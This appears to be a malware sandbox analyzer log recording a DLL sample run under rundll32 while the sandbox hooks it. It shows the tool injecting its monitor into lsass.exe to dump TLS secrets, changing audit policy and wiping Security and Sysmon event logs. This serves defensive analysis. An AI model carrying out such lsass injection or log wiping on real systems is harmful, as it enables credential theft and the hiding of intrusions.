"log": "2025-11-14 14:52:10,430 [root] INFO: Date set to: 20251115T08:47:01, timeout set to: 200\n2025-11-15 08:47:01,228 [root] DEBUG: Starting analyzer from: C:\\yzxx4c5b\n2025-11-15 08:47:01,228 [root] DEBUG: Storing results at: C:\\zFLSjDX\n2025-11-15 08:47:01,228 [root] DEBUG: Pipe server name: \\\\.\\PIPE\\IoWoJfwM\n2025-11-15 08:47:01,228 [root] DEBUG: Python path: C:\\Users\\apogean\\AppData\\Local\\Programs\\Python\\Python311-32\n2025-11-15 08:47:01,228 [root] INFO: analysis running as an admin\n2025-11-15 08:47:01,228 [root] INFO: analysis package specified: \"dll\"\n2025-11-15 08:47:01,228 [root] DEBUG: importing analysis package module: \"modules.packages.dll\"...\n2025-11-15 08:47:01,759 [root] DEBUG: imported analysis package \"dll\"\n2025-11-15 08:47:01,759 [root] DEBUG: initializing analysis package \"dll\"...\n2025-11-15 08:47:01,774 [lib.common.common] INFO: wrapping\n2025-11-15 08:47:01,774 [lib.core.compound] INFO: C:\\Users\\apogean\\AppData\\Local\\Temp already exists, skipping creation\n2025-11-15 08:47:01,790 [root] DEBUG: New location of moved file: C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll\n2025-11-15 08:47:01,790 [root] INFO: Analyzer: Package modules.packages.dll does not specify a DLL option\n2025-11-15 08:47:01,806 [root] INFO: Analyzer: Package modules.packages.dll does not specify a DLL_64 option\n2025-11-15 08:47:01,806 [root] INFO: Analyzer: Package modules.packages.dll does not specify a loader option\n2025-11-15 08:47:01,821 [root] INFO: Analyzer: Package modules.packages.dll does not specify a loader_64 option\n2025-11-15 08:47:03,476 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.browser\"\n2025-11-15 08:47:03,482 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.curtain\"\n2025-11-15 08:47:03,528 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.digisig\"\n2025-11-15 08:47:03,733 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.disguise\"\n2025-11-15 08:47:03,757 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.evtx\"\n2025-11-15 08:47:03,767 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.procmon\"\n2025-11-15 08:47:03,777 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.recentfiles\"\n2025-11-15 08:47:04,009 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops'\n2025-11-15 08:47:04,009 [lib.api.screenshot] ERROR: No module named 'PIL'\n2025-11-15 08:47:04,009 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.screenshots\"\n2025-11-15 08:47:04,039 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.sysmon\"\n2025-11-15 08:47:04,078 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.tlsdump\"\n2025-11-15 08:47:04,086 [modules.auxiliary.watchdownloads] DEBUG: Could not load auxiliary module WatchDownloads due to 'No module named 'watchdog''\n2025-11-15 08:47:04,086 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.watchdownloads\"\n2025-11-15 08:47:04,088 [root] DEBUG: Initialized auxiliary module \"Browser\"\n2025-11-15 08:47:04,088 [root] DEBUG: attempting to configure 'Browser' from data\n2025-11-15 08:47:04,088 [root] DEBUG: module Browser does not support data configuration, ignoring\n2025-11-15 08:47:04,088 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.browser\"...\n2025-11-15 08:47:04,099 [root] DEBUG: Started auxiliary module modules.auxiliary.browser\n2025-11-15 08:47:04,099 [root] DEBUG: Initialized auxiliary module \"Curtain\"\n2025-11-15 08:47:04,099 [root] DEBUG: attempting to configure 'Curtain' from data\n2025-11-15 08:47:04,099 [root] DEBUG: module Curtain does not support data configuration, ignoring\n2025-11-15 08:47:04,099 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.curtain\"...\n2025-11-15 08:47:04,104 [root] DEBUG: Started auxiliary module modules.auxiliary.curtain\n2025-11-15 08:47:04,104 [root] DEBUG: Initialized auxiliary module \"DigiSig\"\n2025-11-15 08:47:04,104 [root] DEBUG: attempting to configure 'DigiSig' from data\n2025-11-15 08:47:04,104 [root] DEBUG: module DigiSig does not support data configuration, ignoring\n2025-11-15 08:47:04,104 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.digisig\"...\n2025-11-15 08:47:04,107 [modules.auxiliary.digisig] DEBUG: Checking for a digital signature\n2025-11-15 08:47:04,539 [modules.auxiliary.digisig] DEBUG: File is not signed\n2025-11-15 08:47:04,539 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json\n2025-11-15 08:47:04,539 [root] DEBUG: Started auxiliary module modules.auxiliary.digisig\n2025-11-15 08:47:04,539 [root] DEBUG: Initialized auxiliary module \"Disguise\"\n2025-11-15 08:47:04,539 [root] DEBUG: attempting to configure 'Disguise' from data\n2025-11-15 08:47:04,539 [root] DEBUG: module Disguise does not support data configuration, ignoring\n2025-11-15 08:47:04,539 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.disguise\"...\n2025-11-15 08:47:04,544 [modules.auxiliary.disguise] INFO: Disguising GUID to 145a4b6a-fc8d-49b0-8ba3-d936855b2e01\n2025-11-15 08:47:04,544 [root] DEBUG: Started auxiliary module modules.auxiliary.disguise\n2025-11-15 08:47:04,544 [root] DEBUG: Initialized auxiliary module \"Evtx\"\n2025-11-15 08:47:04,544 [root] DEBUG: attempting to configure 'Evtx' from data\n2025-11-15 08:47:04,544 [root] DEBUG: module Evtx does not support data configuration, ignoring\n2025-11-15 08:47:04,544 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.evtx\"...\n2025-11-15 08:47:04,549 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Security State Change\" /success:enable /failure:enable\n2025-11-15 08:47:04,549 [root] DEBUG: Started auxiliary module modules.auxiliary.evtx\n2025-11-15 08:47:04,549 [root] DEBUG: Initialized auxiliary module \"Procmon\"\n2025-11-15 08:47:04,549 [root] DEBUG: attempting to configure 'Procmon' from data\n2025-11-15 08:47:04,549 [root] DEBUG: module Procmon does not support data configuration, ignoring\n2025-11-15 08:47:04,549 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.procmon\"...\n2025-11-15 08:47:04,549 [root] DEBUG: Started auxiliary module modules.auxiliary.procmon\n2025-11-15 08:47:04,549 [root] DEBUG: Initialized auxiliary module \"RecentFiles\"\n2025-11-15 08:47:04,549 [root] DEBUG: attempting to configure 'RecentFiles' from data\n2025-11-15 08:47:04,554 [root] DEBUG: module RecentFiles does not support data configuration, ignoring\n2025-11-15 08:47:04,554 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.recentfiles\"...\n2025-11-15 08:47:04,559 [modules.auxiliary.recentfiles] DEBUG: Wrote 'recentfile' C:\\Users\\apogean\\Documents\\IZIBpirCfXPkpIgQ.docm to disk.\n2025-11-15 08:47:04,689 [modules.auxiliary.recentfiles] DEBUG: Wrote 'recentfile' C:\\Users\\apogean\\Documents\\qPtkBAPBexz.docx to disk.\n2025-11-15 08:47:04,720 [modules.auxiliary.recentfiles] DEBUG: Wrote 'recentfile' C:\\Users\\apogean\\Documents\\iJhLwXWjTGpJi.rtf to disk.\n2025-11-15 08:47:04,744 [modules.auxiliary.recentfiles] DEBUG: Wrote 'recentfile' C:\\Users\\apogean\\Documents\\pfYBaXHQVy.doc to disk.\n2025-11-15 08:47:04,764 [modules.auxiliary.recentfiles] DEBUG: Wrote 'recentfile' C:\\Users\\apogean\\Documents\\FYraemJhMCalUUoe.docx to disk.\n2025-11-15 08:47:04,779 [modules.auxiliary.recentfiles] DEBUG: Wrote 'recentfile' C:\\Users\\apogean\\Documents\\hTXfKuLyuLyj.doc to disk.\n2025-11-15 08:47:04,814 [modules.auxiliary.recentfiles] DEBUG: Wrote 'recentfile' C:\\Users\\apogean\\Documents\\HXtRBxCOej.ppt to disk.\n2025-11-15 08:47:04,824 [modules.auxiliary.recentfiles] DEBUG: Wrote 'recentfile' C:\\Users\\apogean\\Documents\\IndLsTZBZq.pptx to disk.\n2025-11-15 08:47:04,844 [modules.auxiliary.recentfiles] DEBUG: Wrote 'recentfile' C:\\Users\\apogean\\Documents\\EdgLSUUTVd.pptx to disk.\n2025-11-15 08:47:04,885 [modules.auxiliary.recentfiles] DEBUG: Wrote 'recentfile' C:\\Users\\apogean\\Documents\\MWjwhHEAsApE.pptx to disk.\n2025-11-15 08:47:04,894 [root] DEBUG: Started auxiliary module modules.auxiliary.recentfiles\n2025-11-15 08:47:04,894 [root] DEBUG: Initialized auxiliary module \"Screenshots\"\n2025-11-15 08:47:04,899 [root] DEBUG: attempting to configure 'Screenshots' from data\n2025-11-15 08:47:04,899 [root] DEBUG: module Screenshots does not support data configuration, ignoring\n2025-11-15 08:47:04,899 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.screenshots\"...\n2025-11-15 08:47:04,909 [modules.auxiliary.screenshots] WARNING: Python Image Library is not installed, screenshots are disabled\n2025-11-15 08:47:04,914 [root] DEBUG: Started auxiliary module modules.auxiliary.screenshots\n2025-11-15 08:47:04,914 [root] DEBUG: Initialized auxiliary module \"Sysmon\"\n2025-11-15 08:47:04,914 [root] DEBUG: attempting to configure 'Sysmon' from data\n2025-11-15 08:47:04,914 [root] DEBUG: module Sysmon does not support data configuration, ignoring\n2025-11-15 08:47:04,914 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.sysmon\"...\n2025-11-15 08:47:05,034 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Security System Extension\" /success:enable /failure:enable\n2025-11-15 08:47:05,207 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"System Integrity\" /success:enable /failure:enable\n2025-11-15 08:47:05,268 [root] WARNING: Cannot execute auxiliary module modules.auxiliary.sysmon: In order to use the Sysmon functionality, it is required to have the SMaster(64|32).exe file and sysmonconfig-export.xml file in the bin path. Note that the SMaster(64|32).exe files are just the standard Sysmon binaries renamed to avoid anti-analysis detection techniques.\n2025-11-15 08:47:05,268 [root] DEBUG: Initialized auxiliary module \"TLSDumpMasterSecrets\"\n2025-11-15 08:47:05,268 [root] DEBUG: attempting to configure 'TLSDumpMasterSecrets' from data\n2025-11-15 08:47:05,268 [root] DEBUG: module TLSDumpMasterSecrets does not support data configuration, ignoring\n2025-11-15 08:47:05,268 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.tlsdump\"...\n2025-11-15 08:47:05,275 [modules.auxiliary.tlsdump] INFO: lsass.exe found, pid 588\n2025-11-15 08:47:05,276 [lib.api.process] INFO: Monitor config for <Process 588 lsass.exe>: C:\\yzxx4c5b\\dll\\588.ini\n2025-11-15 08:47:05,284 [lib.api.process] INFO: Option 'tlsdump' with value '1' sent to monitor\n2025-11-15 08:47:05,290 [lib.api.process] INFO: 64-bit DLL to inject is C:\\yzxx4c5b\\dll\\UcXKmb.dll, loader C:\\yzxx4c5b\\bin\\XQZTKWcp.exe\n2025-11-15 08:47:05,319 [root] DEBUG: Loader: Injecting process 588 with C:\\yzxx4c5b\\dll\\UcXKmb.dll.\n2025-11-15 08:47:05,328 [root] DEBUG: 588: Python path set to 'C:\\Users\\apogean\\AppData\\Local\\Programs\\Python\\Python311-32'.\n2025-11-15 08:47:05,340 [root] DEBUG: 588: Disabling sleep skipping.\n2025-11-15 08:47:05,344 [root] DEBUG: 588: TLS secret dump mode enabled.\n2025-11-15 08:47:05,380 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"IPsec Driver\" /success:disable /failure:disable\n2025-11-15 08:47:05,399 [root] DEBUG: 588: RtlInsertInvertedFunctionTable 0x00007FFC1390090E, LdrpInvertedFunctionTableSRWLock 0x00007FFC13A5D510\n2025-11-15 08:47:05,409 [root] DEBUG: 588: Monitor initialised: 64-bit capemon loaded in process 588 at 0x00007FFBE2830000, thread 7368, image base 0x00007FF7C0B20000, stack from 0x0000001084073000-0x0000001084080000\n2025-11-15 08:47:05,419 [root] DEBUG: 588: Commandline: C:\\Windows\\system32\\lsass.exe\n2025-11-15 08:47:05,431 [root] DEBUG: 588: Hooked 5 out of 5 functions\n2025-11-15 08:47:05,434 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.\n2025-11-15 08:47:05,439 [root] DEBUG: Successfully injected DLL C:\\yzxx4c5b\\dll\\UcXKmb.dll.\n2025-11-15 08:47:05,444 [lib.api.process] INFO: Injected into 64-bit <Process 588 lsass.exe>\n2025-11-15 08:47:05,444 [root] DEBUG: Started auxiliary module modules.auxiliary.tlsdump\n2025-11-15 08:47:05,444 [root] DEBUG: Initialized auxiliary module \"WatchDownloads\"\n2025-11-15 08:47:05,444 [root] DEBUG: attempting to configure 'WatchDownloads' from data\n2025-11-15 08:47:05,444 [root] DEBUG: module WatchDownloads does not support data configuration, ignoring\n2025-11-15 08:47:05,444 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.watchdownloads\"...\n2025-11-15 08:47:05,444 [root] DEBUG: Started auxiliary module modules.auxiliary.watchdownloads\n2025-11-15 08:47:05,454 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Other System Events\" /success:disable /failure:enable\n2025-11-15 08:47:05,500 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Logon\" /success:enable /failure:enable\n2025-11-15 08:47:05,545 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Logoff\" /success:enable /failure:enable\n2025-11-15 08:47:05,636 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Account Lockout\" /success:enable /failure:enable\n2025-11-15 08:47:05,782 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"IPsec Main Mode\" /success:disable /failure:disable\n2025-11-15 08:47:05,875 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"IPsec Quick Mode\" /success:disable /failure:disable\n2025-11-15 08:47:05,969 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"IPsec Extended Mode\" /success:disable /failure:disable\n2025-11-15 08:47:06,095 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Other Logon/Logoff Events\" /success:enable /failure:enable\n2025-11-15 08:47:06,195 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Network Policy Server\" /success:enable /failure:enable\n2025-11-15 08:47:06,295 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Special Logon\" /success:enable /failure:enable\n2025-11-15 08:47:06,373 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"File System\" /success:enable /failure:enable\n2025-11-15 08:47:06,473 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Registry\" /success:enable /failure:enable\n2025-11-15 08:47:06,757 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Kernel Object\" /success:enable /failure:enable\n2025-11-15 08:47:06,829 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"SAM\" /success:disable /failure:disable\n2025-11-15 08:47:06,908 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Certification Services\" /success:enable /failure:enable\n2025-11-15 08:47:07,018 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Handle Manipulation\" /success:disable /failure:disable\n2025-11-15 08:47:07,221 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Application Generated\" /success:enable /failure:enable\n2025-11-15 08:47:07,623 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"File Share\" /success:enable /failure:enable\n2025-11-15 08:47:07,701 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Filtering Platform Packet Drop\" /success:disable /failure:disable\n2025-11-15 08:47:07,812 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Filtering Platform Connection\" /success:disable /failure:disable\n2025-11-15 08:47:07,900 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Other Object Access Events\" /success:disable /failure:disable\n2025-11-15 08:47:08,001 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Sensitive Privilege Use\" /success:disable /failure:disable\n2025-11-15 08:47:08,085 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Non Sensitive Privilege Use\" /success:disable /failure:disable\n2025-11-15 08:47:08,170 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Other Privilege Use Events\" /success:disable /failure:disable\n2025-11-15 08:47:08,270 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"RPC Events\" /success:enable /failure:enable\n2025-11-15 08:47:08,339 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Audit Policy Change\" /success:enable /failure:enable\n2025-11-15 08:47:08,424 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Authentication Policy Change\" /success:enable /failure:enable\n2025-11-15 08:47:08,524 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"MPSSVC Rule-Level Policy Change\" /success:disable /failure:disable\n2025-11-15 08:47:08,862 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Filtering Platform Policy Change\" /success:disable /failure:disable\n2025-11-15 08:47:08,947 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Other Policy Change Events\" /success:disable /failure:enable\n2025-11-15 08:47:09,016 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"User Account Management\" /success:enable /failure:enable\n2025-11-15 08:47:09,116 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Computer Account Management\" /success:enable /failure:enable\n2025-11-15 08:47:09,210 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Security Group Management\" /success:enable /failure:enable\n2025-11-15 08:47:09,279 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Distribution Group Management\" /success:enable /failure:enable\n2025-11-15 08:47:09,395 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Application Group Management\" /success:enable /failure:enable\n2025-11-15 08:47:09,480 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Other Account Management Events\" /success:enable /failure:enable\n2025-11-15 08:47:09,578 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Directory Service Access\" /success:enable /failure:enable\n2025-11-15 08:47:09,680 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Directory Service Changes\" /success:enable /failure:enable\n2025-11-15 08:47:09,761 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Directory Service Replication\" /success:disable /failure:enable\n2025-11-15 08:47:09,861 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Detailed Directory Service Replication\" /success:disable /failure:disable\n2025-11-15 08:47:09,940 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Credential Validation\" /success:enable /failure:enable\n2025-11-15 08:47:10,032 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Kerberos Service Ticket Operations\" /success:enable /failure:enable\n2025-11-15 08:47:10,141 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Other Account Logon Events\" /success:enable /failure:enable\n2025-11-15 08:47:10,231 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Kerberos Authentication Service\" /success:enable /failure:enable\n2025-11-15 08:47:10,344 [modules.auxiliary.evtx] DEBUG: Wiping Application\n2025-11-15 08:47:10,442 [modules.auxiliary.evtx] DEBUG: Wiping HardwareEvents\n2025-11-15 08:47:10,552 [modules.auxiliary.evtx] DEBUG: Wiping Internet Explorer\n2025-11-15 08:47:10,695 [modules.auxiliary.evtx] DEBUG: Wiping Key Management Service\n2025-11-15 08:47:10,876 [modules.auxiliary.evtx] DEBUG: Wiping OAlerts\n2025-11-15 08:47:10,956 [modules.auxiliary.evtx] DEBUG: Wiping Security\n2025-11-15 08:47:11,067 [modules.auxiliary.evtx] DEBUG: Wiping Setup\n2025-11-15 08:47:11,178 [modules.auxiliary.evtx] DEBUG: Wiping System\n2025-11-15 08:47:11,286 [modules.auxiliary.evtx] DEBUG: Wiping Windows PowerShell\n2025-11-15 08:47:11,419 [modules.auxiliary.evtx] DEBUG: Wiping Microsoft-Windows-Sysmon/Operational\n2025-11-15 08:47:11,479 [root] INFO: Restarting WMI Service\n2025-11-15 08:47:13,657 [root] DEBUG: package modules.packages.dll does not support configure, ignoring\n2025-11-15 08:47:13,657 [root] WARNING: configuration error for package modules.packages.dll: error importing data.packages.dll: No module named 'data.packages'\n2025-11-15 08:47:13,657 [lib.core.compound] INFO: C:\\Users\\apogean\\AppData\\Local\\Temp already exists, skipping creation\n2025-11-15 08:47:13,694 [lib.api.process] INFO: Successfully executed process from path \"C:\\Windows\\System32\\rundll32.exe\" with arguments \"\"C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll\",#1\" with pid 1052\n2025-11-15 08:47:13,694 [lib.api.process] INFO: Monitor config for <Process 1052 rundll32.exe>: C:\\yzxx4c5b\\dll\\1052.ini\n2025-11-15 08:47:13,694 [lib.api.process] INFO: 32-bit DLL to inject is C:\\yzxx4c5b\\dll\\oLcKCMmD.dll, loader C:\\yzxx4c5b\\bin\\DbbZncw.exe\n2025-11-15 08:47:13,772 [root] DEBUG: Loader: Injecting process 1052 (thread 3260) with C:\\yzxx4c5b\\dll\\oLcKCMmD.dll.\n2025-11-15 08:47:13,788 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.\n2025-11-15 08:47:13,788 [root] DEBUG: Successfully injected DLL C:\\yzxx4c5b\\dll\\oLcKCMmD.dll.\n2025-11-15 08:47:13,807 [lib.api.process] INFO: Injected into 32-bit <Process 1052 rundll32.exe>\n2025-11-15 08:47:15,811 [lib.api.process] INFO: Successfully resumed <Process 1052 rundll32.exe>\n2025-11-15 08:47:15,873 [root] DEBUG: 1052: Python path set to 'C:\\Users\\apogean\\AppData\\Local\\Programs\\Python\\Python311-32'.\n2025-11-15 08:47:15,873 [root] DEBUG: 1052: Disabling sleep skipping.\n2025-11-15 08:47:15,873 [root] DEBUG: 1052: Dropped file limit defaulting to 100.\n2025-11-15 08:47:15,951 [root] DEBUG: 1052: YaraInit: Compiled 43 rule files\n2025-11-15 08:47:15,983 [root] DEBUG: 1052: YaraInit: Compiled rules saved to file C:\\yzxx4c5b\\data\\yara\\capemon.yac\n2025-11-15 08:47:15,983 [root] DEBUG: 1052: YaraScan: Scanning 0x00960000, size 0x136e8\n2025-11-15 08:47:15,983 [root] DEBUG: 1052: Monitor initialised: 32-bit capemon loaded in process 1052 at 0x72220000, thread 3260, image base 0x960000, stack from 0x493000-0x4a0000\n2025-11-15 08:47:15,998 [root] DEBUG: 1052: Commandline: \"C:\\Windows\\System32\\rundll32.exe\" \"C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll\",#1\n2025-11-15 08:47:16,108 [root] DEBUG: 1052: hook_api: LdrpCallInitRoutine export address 0x77A32A30 obtained via GetFunctionAddress\n2025-11-15 08:47:16,108 [root] DEBUG: 1052: hook_api: Warning - CreateProcessA export address 0x76364110 differs from GetProcAddress -> 0x72A822A0 (AcLayers.DLL::0x222a0)\n2025-11-15 08:47:16,123 [root] DEBUG: 1052: hook_api: Warning - CreateProcessW export address 0x763488E0 differs from GetProcAddress -> 0x72A824E0 (AcLayers.DLL::0x224e0)\n2025-11-15 08:47:16,123 [root] DEBUG: 1052: hook_api: Warning - WinExec export address 0x7638E1C0 differs from GetProcAddress -> 0x72A827A0 (AcLayers.DLL::0x227a0)\n2025-11-15 08:47:16,186 [root] WARNING: b'Unable to place hook on GetCommandLineA'\n2025-11-15 08:47:16,186 [root] DEBUG: 1052: set_hooks: Unable to hook GetCommandLineA\n2025-11-15 08:47:16,186 [root] WARNING: b'Unable to place hook on GetCommandLineW'\n2025-11-15 08:47:16,186 [root] DEBUG: 1052: set_hooks: Unable to hook GetCommandLineW\n2025-11-15 08:47:16,264 [root] DEBUG: 1052: Hooked 625 out of 627 functions\n2025-11-15 08:47:16,264 [root] DEBUG: 1052: Syscall hook installed, syscall logging level 1\n2025-11-15 08:47:16,264 [root] DEBUG: 1052: RestoreHeaders: Restored original import table.\n2025-11-15 08:47:16,264 [root] INFO: Loaded monitor into process with pid 1052\n2025-11-15 08:47:16,280 [root] DEBUG: 1052: caller_dispatch: Added region at 0x00960000 to tracked regions list (ntdll::memcpy returns to 0x00965F1A, thread 3260).\n2025-11-15 08:47:16,280 [root] DEBUG: 1052: YaraScan: Scanning 0x00960000, size 0x136e8\n2025-11-15 08:47:16,280 [root] DEBUG: 1052: ProcessImageBase: Main module image at 0x00960000 unmodified (entropy change 0.000000e+00)\n2025-11-15 08:47:16,295 [root] DEBUG: 1052: InstrumentationCallback: Added region at 0x76352B4C (base 0x76330000) to tracked regions list (thread 3260).\n2025-11-15 08:47:16,295 [root] DEBUG: 1052: ProcessTrackedRegion: Region at 0x76330000 mapped as \\Device\\HarddiskVolume2\\Windows\\SysWOW64\\kernel32.dll is in known range, skipping\n2025-11-15 08:47:16,311 [root] DEBUG: 1052: ProcessTrackedRegion: Region at 0x76330000 mapped as \\Device\\HarddiskVolume2\\Windows\\SysWOW64\\kernel32.dll is in known range, skipping\n2025-11-15 08:47:16,436 [root] DEBUG: 1052: InstrumentationCallback: Added region at 0x7607413C (base 0x75F30000) to tracked regions list (thread 3260).\n2025-11-15 08:47:16,436 [root] DEBUG: 1052: ProcessTrackedRegion: Region at 0x75F30000 mapped as \\Device\\HarddiskVolume2\\Windows\\SysWOW64\\KernelBase.dll is in known range, skipping\n2025-11-15 08:47:16,483 [root] DEBUG: 1052: DLL loaded at 0x730A0000: C:\\Windows\\SYSTEM32\\TextShaping (0x94000 bytes).\n2025-11-15 08:47:16,514 [root] DEBUG: 1052: DLL loaded at 0x73AE0000: C:\\Windows\\system32\\uxtheme (0x74000 bytes).\n2025-11-15 08:47:16,530 [root] DEBUG: 1052: DLL loaded at 0x76620000: C:\\Windows\\System32\\MSCTF (0xd4000 bytes).\n2025-11-15 08:47:16,561 [root] DEBUG: 1052: set_hooks_by_export_directory: Hooked 0 out of 627 functions\n2025-11-15 08:47:16,561 [root] DEBUG: 1052: DLL loaded at 0x74E50000: C:\\Windows\\SYSTEM32\\kernel.appcore (0xf000 bytes).\n2025-11-15 08:47:16,577 [root] DEBUG: 1052: DLL loaded at 0x75E60000: C:\\Windows\\System32\\bcryptPrimitives (0x5f000 bytes).\n2025-11-15 08:47:16,586 [root] DEBUG: 1052: DLL loaded at 0x73F80000: C:\\Windows\\SYSTEM32\\ntmarta (0x29000 bytes).\n2025-11-15 08:47:16,586 [root] DEBUG: 1052: DLL loaded at 0x71E40000: C:\\Windows\\System32\\CoreMessaging (0x9b000 bytes).\n2025-11-15 08:47:16,591 [root] DEBUG: 1052: DLL loaded at 0x72EB0000: C:\\Windows\\SYSTEM32\\wintypes (0xdb000 bytes).\n2025-11-15 08:47:16,591 [root] DEBUG: 1052: DLL loaded at 0x71EE0000: C:\\Windows\\System32\\CoreUIComponents (0x27e000 bytes).\n2025-11-15 08:47:16,591 [root] DEBUG: 1052: DLL loaded at 0x72160000: C:\\Windows\\SYSTEM32\\textinputframework (0xba000 bytes).\n2025-11-15 08:47:27,194 [root] DEBUG: 588: TLS 1.2 secrets logged to: C:\\zFLSjDX\\tlsdump\\tlsdump.log\n2025-11-14 04:25:26,025 [root] INFO: Analysis timeout hit, terminating analysis\n2025-11-14 04:25:26,025 [lib.api.process] INFO: Terminate event set for <Process 1052 rundll32.exe>\n2025-11-14 04:25:26,025 [root] DEBUG: 1052: Terminate Event: Attempting to dump process 1052\n2025-11-14 04:25:27,572 [root] DEBUG: 1052: DoProcessDump: Skipping process dump as code is identical on disk.\n2025-11-14 04:25:27,588 [lib.api.process] INFO: Termination confirmed for <Process 1052 rundll32.exe>\n2025-11-14 04:25:27,588 [root] INFO: Terminate event set for process 1052\n2025-11-14 04:25:27,588 [root] INFO: Created shutdown mutex\n2025-11-14 04:25:27,588 [root] DEBUG: 1052: Terminate Event: monitor shutdown complete for process 1052\n2025-11-14 04:25:28,603 [root] INFO: Shutting down package\n2025-11-14 04:25:28,603 [root] INFO: Stopping auxiliary modules\n2025-11-14 04:25:28,603 [root] INFO: Stopping auxiliary module: Browser\n2025-11-14 04:25:28,603 [root] INFO: Stopping auxiliary module: Curtain\n2025-11-14 04:25:28,822 [lib.common.results] INFO: Uploading file C:\\curtain.log to curtain/1763123128.8223877.curtain.log; Size is 4096; Max size: 100000000\n2025-11-14 04:25:28,838 [root] INFO: Stopping 